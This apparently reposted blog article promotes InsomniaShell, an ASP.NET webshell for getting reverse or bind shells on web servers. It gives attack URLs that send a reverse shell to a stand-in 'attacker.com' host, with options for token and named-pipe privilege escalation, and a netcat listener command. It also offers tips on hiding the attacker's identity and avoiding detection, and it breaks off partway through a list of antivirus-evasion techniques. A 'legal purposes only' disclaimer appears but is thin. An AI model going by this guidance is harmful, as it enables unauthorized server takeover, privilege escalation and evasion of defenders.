top of page

支援グループ

公開·9名のメンバー

InsomniaShell: A Stealthy and Flexible Tool for ASP.NET Reverse and Bind Shells



InsomniaShell ASP.NET Reverse Shell Or Bind Shell




If you are looking for a tool that can help you gain remote access to a web server running ASP.NET, you may want to check out InsomniaShell. InsomniaShell is a tool for use during penetration tests, when you have the ability to upload or create an arbitrary .aspx page on the target server. This .aspx page is an example of using native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. In this article, we will explain what InsomniaShell is, how it works, and how you can use it for ethical hacking purposes.




InsomniaShell – ASP.NET Reverse Shell Or Bind Shell



What is InsomniaShell and what does it do?




InsomniaShell is a tool developed by k4u5h41 on GitHub. It is based on the original code by Darknet. It allows you to create a reverse or bind shell on a web server running ASP.NET. A reverse shell is a type of networking setup where the target machine initiates an outgoing connection to the attacker's machine and establishes a shell session. A bind shell is a type of networking setup where the attacker connects to a listening port on the target machine and obtains a shell session. Both types of shells enable the attacker to execute commands on the target machine and access its resources.


What is ASP.NET and why is it used for web development?




ASP.NET is an open source web framework, created by Microsoft, for building modern web apps and services with .NET. ASP.NET is cross platform and runs on Windows, Linux, macOS, and Docker. ASP.NET supports many different development models, such as Web Forms, MVC, Web Pages, API, and Core. ASP.NET pages have the extension .aspx and are normally written in C# or VB.NET. ASP.NET is built on the Common Language Runtime (CLR), allowing programmers to write ASP.NET code using any supported .NET language.


ASP.NET is widely used for web development because it offers many benefits, such as:


  • High performance and scalability



  • Rich set of controls and libraries



  • Easy integration with databases and web services



  • Support for multiple languages and platforms



  • Security features such as authentication, authorization, encryption, etc.



  • Debugging and testing tools



  • Open source and community-driven



What are reverse shell and bind shell and how do they differ?




A reverse shell and a bind shell are two common techniques for creating backdoors and maintaining persistence on a target machine. They allow an attacker to gain remote access to a system shell and execute commands on the target machine. However, they differ in how they establish the connection between the attacker and the target.


TypeDescriptionAdvantagesDisadvantages


Reverse shellThe target machine initiates an outgoing connection to the attacker's machine and establishes a shell session.- Bypasses firewall rules that block incoming connections- Works well with NAT and dynamic IP addresses- Can be initiated by a simple HTTP request or other methods- Requires the attacker's machine to be online and listening- May be detected by outgoing traffic monitoring- May be blocked by egress filtering or proxy servers


Bind shellThe target machine opens a listening port and waits for the attacker to connect and obtain a shell session.- Does not depend on the attacker's machine being online or listening- Less likely to be detected by outgoing traffic monitoring- Works well with static IP addresses- May be blocked by firewall rules that restrict incoming connections- May be detected by port scanning or listening services- Does not work well with NAT or dynamic IP addresses


Both reverse shell and bind shell have their pros and cons, and the choice of which one to use depends on the situation and the goal of the attacker. In general, reverse shells are more popular and effective than bind shells, as they can bypass most firewall restrictions and work with any type of IP address.


How to use InsomniaShell for penetration testing




InsomniaShell is a tool that can help you create a reverse or bind shell on a web server running ASP.NET. To use InsomniaShell, you need to have the ability to upload or create an arbitrary .aspx page on the target server. This can be done by exploiting a file upload vulnerability, a remote code execution vulnerability, or a misconfigured web server. Once you have uploaded or created the .aspx page, you can access it from your browser or a command line tool such as curl or wget. The .aspx page will execute native calls through pinvoke to provide either a reverse or bind shell, depending on the parameters you pass to it.


The parameters for InsomniaShell are as follows:


  • mode: either "reverse" or "bind" to specify the type of shell



  • ip: the IP address of the attacker's machine (for reverse shell) or the target machine (for bind shell)



  • port: the port number to use for the connection



  • token: an optional parameter to search for SYSTEM or Administrator tokens for impersonation



  • pipe: an optional parameter to perform a named pipe impersonation attack on a local SQL Server instance



For example, if you want to create a reverse shell on port 4444, you can use the following URL:


http://target.com/insomnia.aspx?mode=reverse&ip=attacker.com&port=4444


If you want to create a bind shell on port 5555, you can use the following URL:


http://target.com/insomnia.aspx?mode=bind&ip=target.com&port=5555


If you want to search for SYSTEM or Administrator tokens for impersonation, you can add the token parameter with any value, such as:


http://target.com/insomnia.aspx?mode=reverse&ip=attacker.com&port=4444&token=yes


If you want to perform a named pipe impersonation attack on a local SQL Server instance, you can add the pipe parameter with the name of the pipe, such as:


http://target.com/insomnia.aspx?mode=reverse&ip=attacker.com&port=4444&pipe=MSSQL$SQLEXPRESS


Once you have accessed the .aspx page with the appropriate parameters, you should receive a shell session on your machine. You can use any tool that supports TCP connections, such as netcat, socat, ncat, etc. For example, if you are using netcat, you can run the following command on your machine:


nc -lvp 4444


This will listen on port 4444 and wait for the connection from the target machine. Once connected, you can execute commands on the target machine and access its resources.


Advantages and disadvantages of InsomniaShell




InsomniaShell is a simple and effective tool for creating reverse or bind shells on ASP.NET web servers. However, like any tool, it has its advantages and disadvantages. Here are some of them:


Advantages of InsomniaShell




  • It is easy to use and does not require any installation or configuration on the target machine.



  • It is cross-platform and works on Windows, Linux, macOS, and Docker environments that support ASP.NET.



  • It is stealthy and does not create any files or registry entries on the target machine.



  • It is flexible and allows you to choose between reverse or bind shell, as well as perform token or pipe impersonation.



Disadvantages of InsomniaShell




  • It requires the target machine to have the .NET framework installed and enabled.



  • It may trigger antivirus or firewall alerts on the target machine or the network.



  • It has limited functionality and does not support features such as file transfer, port forwarding, tunneling, etc.



Conclusion




InsomniaShell is a tool that can help you create a reverse or bind shell on a web server running ASP.NET. It is useful for penetration testing and ethical hacking purposes, when you have the ability to upload or create an arbitrary .aspx page on the target server. It allows you to execute native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. It also supports token and pipe impersonation for privilege escalation. However, it also has some drawbacks, such as requiring the .NET framework, triggering antivirus or firewall alerts, and having limited functionality.


If you want to use InsomniaShell for your own projects, you should follow some tips and best practices, such as:


  • Always use InsomniaShell with permission and for legal purposes only.



  • Always test InsomniaShell on your own machines before using it on a target machine.



  • Always use a VPN or a proxy to hide your IP address and protect your identity.



  • Always use a random and unique name for the .aspx page to avoid detection and suspicion.



  • Always delete the .aspx page after you are done with the shell session.



We hope you enjoyed this article and learned something new about InsomniaShell, ASP.NET, and reverse shells. If you want to download InsomniaShell or learn more about it, you can visit its GitHub repository. If you have any questions or feedback, feel free to leave a comment below. Thank you for reading!


FAQs




Where can I download InsomniaShell?




You can download InsomniaShell from its GitHub repository. You can also clone it using git or download it as a zip file. The repository contains the source code and the compiled binary of InsomniaShell.


How can I prevent InsomniaShell from being detected by antivirus?




There is no guarantee that InsomniaShell will not be detected by antivirus, as different antivirus programs have different detection methods and signatures. However, you can try some techniques to evade antivirus detection, such as:


  • Obfuscating or encrypting the .aspx page code



  • Using a custom pinvoke library instead of kernel32.dll



  • Using alternative methods of creating processes or sockets



  • Using